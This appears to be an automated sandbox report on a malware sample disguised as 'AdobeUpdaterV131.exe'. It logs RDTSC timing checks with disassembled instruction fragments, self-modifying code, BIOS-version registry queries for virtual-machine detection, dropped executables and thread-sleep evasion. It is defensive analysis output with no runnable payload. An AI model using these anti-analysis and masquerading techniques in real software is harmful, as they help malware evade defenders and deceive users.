            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60DCA second address: 4E60DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CB5h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60DF1 second address: 4E60DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60DF7 second address: 4E60DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60DFB second address: 4E60E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60E1A second address: 4E60E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60E22 second address: 4E60E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007F09D0D9C3DCh 0x00000011 mov bl, ah 0x00000013 pop edi 0x00000014 push ecx 0x00000015 jmp 00007F09D0D9C3E3h 0x0000001a pop esi 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60E5B second address: 4E60E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E60E5F second address: 4E60E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10AC4 second address: 4F10AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10AC8 second address: 4F10ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10ACE second address: 4F10AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, cx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10AE7 second address: 4F10B1A instructions: 0x00000000 rdtsc 0x00000002 mov ah, E8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0D9C3E7h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10B1A second address: 4F10B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 sbb si, F076h 0x00000019 jmp 00007F09D0731CB1h 0x0000001e popfd 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10B75 second address: 4F10B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10B79 second address: 4F10B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104BB second address: 4F104C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104C0 second address: 4F104D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, ebx 0x00000012 mov edi, 6A894264h 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104D8 second address: 4F104DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104DE second address: 4F104E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104E2 second address: 4F104E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104E6 second address: 4F104F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104F6 second address: 4F104FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F104FC second address: 4F10533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F09D0731CB9h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10533 second address: 4F10537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10537 second address: 4F1053D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F1053D second address: 4F1058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F09D0D9C3D9h 0x0000000e jmp 00007F09D0D9C3E0h 0x00000013 push eax 0x00000014 pushad 0x00000015 mov dh, 25h 0x00000017 pushad 0x00000018 mov ebx, esi 0x0000001a mov al, 50h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F09D0D9C3DDh 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10619 second address: 4F1062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CAEh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F1062B second address: 4F10667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d jmp 00007F09D0D9C3DCh 0x00000012 inc edi 0x00000013 jmp 00007F09D0D9C3E0h 0x00000018 and dword ptr [ebp-04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F09D0D9C3DAh 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10667 second address: 4F10676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10676 second address: 4F1067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F1067C second address: 4F10680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10680 second address: 4F10684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10684 second address: 4F1069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CAAh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F1069A second address: 4F10706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A4192EDE8h 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 lea eax, dword ptr [ebp-00000110h] 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e mov dh, 04h 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F09D0D9C3E7h 0x0000002a jmp 00007F09D0D9C3E8h 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10774 second address: 4F107EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 jmp 00007F09D0731CABh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f pushad 0x00000010 mov dh, ch 0x00000012 pushfd 0x00000013 jmp 00007F09D0731CB1h 0x00000018 and eax, 6B884E16h 0x0000001e jmp 00007F09D0731CB1h 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F0A412C45B2h 0x0000002b jmp 00007F09D0731CAEh 0x00000030 mov eax, dword ptr [ebp-00000110h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F09D0731CB7h 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F107EA second address: 4F107F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F107F0 second address: 4F10822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebx], eax 0x0000000a jmp 00007F09D0731CB7h 0x0000000f lea ecx, dword ptr [ebp-0000010Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, A236h 0x0000001c movsx edi, si 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10871 second address: 4F108B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 je 00007F0A4192EBFBh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F09D0D9C3DDh 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F108B8 second address: 4F10944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F09D0731CB0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F09D0731CB1h 0x00000017 or ecx, 6C0E73C6h 0x0000001d jmp 00007F09D0731CB1h 0x00000022 popfd 0x00000023 mov eax, 71A7A877h 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b mov ah, 2Fh 0x0000002d mov ebx, 147D1C68h 0x00000032 popad 0x00000033 lea ecx, dword ptr [ebx+04h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dx, ax 0x0000003c pushfd 0x0000003d jmp 00007F09D0731CB4h 0x00000042 or ecx, 101EEEC8h 0x00000048 jmp 00007F09D0731CABh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10944 second address: 4F1094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F10A6E second address: 4F10A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSpecial instruction interceptor: First address: 8F865B instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSpecial instruction interceptor: First address: 921F14 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSpecial instruction interceptor: First address: 75F912 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSpecial instruction interceptor: First address: 90A742 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSpecial instruction interceptor: First address: 98762D instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: D8865B instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: DB1F14 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: BEF912 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: D9A742 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: E1762D instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 89865B instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 8C1F14 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 6FF912 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 8AA742 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 92762D instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_04F1074F rdtsc 0_2_04F1074F
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow / User API: threadDelayed 1372Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow / User API: threadDelayed 430Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeWindow / User API: threadDelayed 6206Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1565Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1121Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1114Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1574Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1116Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1138Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 462Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1071Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1233Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1244Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 366Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 369Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 478Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 5627Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeEvaded block: after key decisiongraph_15-1168
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1074
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6472Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6472Thread sleep time: -82041s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104Thread sleep count: 1372 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104Thread sleep time: -2745372s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596Thread sleep count: 63 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6500Thread sleep count: 50 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6500Thread sleep time: -100050s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6276Thread sleep count: 160 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6276Thread sleep time: -320160s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596Thread sleep count: 430 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596Thread sleep time: -43000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 7288Thread sleep count: 210 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6428Thread sleep count: 166 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6428Thread sleep time: -332166s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 7288Thread sleep count: 239 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104Thread sleep count: 6206 > 30Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104Thread sleep time: -12418206s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480Thread sleep count: 94 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480Thread sleep time: -188094s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7464Thread sleep count: 121 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7464Thread sleep time: -242121s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7660Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7420Thread sleep count: 1565 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7420Thread sleep time: -156500s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724Thread sleep count: 1121 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7452Thread sleep count: 106 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7452Thread sleep time: -212106s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724Thread sleep count: 1114 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724Thread sleep time: -111400s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508Thread sleep count: 113 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508Thread sleep time: -226113s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7516Thread sleep count: 112 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7516Thread sleep time: -224112s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7656Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7432Thread sleep count: 1574 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7432Thread sleep time: -157400s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7728Thread sleep count: 1116 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7564Thread sleep count: 93 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7564Thread sleep time: -186093s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7540Thread sleep count: 91 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7540Thread sleep time: -182091s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7556Thread sleep count: 118 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7556Thread sleep time: -236118s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7896Thread sleep time: -48024s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7868Thread sleep count: 1138 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7868Thread sleep time: -2277138s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852Thread sleep count: 462 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852Thread sleep time: -46200s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072Thread sleep count: 208 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7872Thread sleep count: 1071 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7872Thread sleep time: -2143071s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072Thread sleep count: 245 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7884Thread sleep count: 1233 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7884Thread sleep time: -2467233s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7892Thread sleep count: 1244 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7892Thread sleep time: -2489244s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6592Thread sleep count: 366 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6592Thread sleep time: -732366s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6564Thread sleep count: 369 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6564Thread sleep time: -738369s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108Thread sleep count: 62 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8184Thread sleep count: 322 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8184Thread sleep time: -644322s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108Thread sleep count: 478 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108Thread sleep time: -47800s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1196Thread sleep count: 221 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1196Thread sleep count: 254 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8172Thread sleep count: 5627 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8172Thread sleep time: -11259627s >= -30000sJump to behavior
